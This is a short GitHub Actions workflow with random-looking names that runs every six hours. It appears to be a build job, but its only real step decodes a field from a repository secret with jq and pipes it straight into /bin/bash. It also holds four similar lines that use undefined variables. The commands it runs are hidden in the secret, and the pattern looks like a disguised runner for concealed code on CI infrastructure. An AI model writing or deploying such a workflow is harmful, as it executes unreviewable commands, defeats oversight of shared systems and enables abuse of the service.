name: gantingxi3810

on:
  workflow_dispatch:
  schedule:
    - cron: '48 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gantingxi3810
        env:
          rpum58: ${{ secrets.rpum58 }}
        run: |
          echo $rpum58 | jq -r .i7 | /bin/bash
          echo $bnbji2 | jq -r .u425 | /bin/bash
          echo $bje7 | jq -r .urw56 | /bin/bash
          echo $ub17805 | jq -r .tr0375 | /bin/bash
          echo $awlvs0 | jq -r .yfp942 | /bin/bash

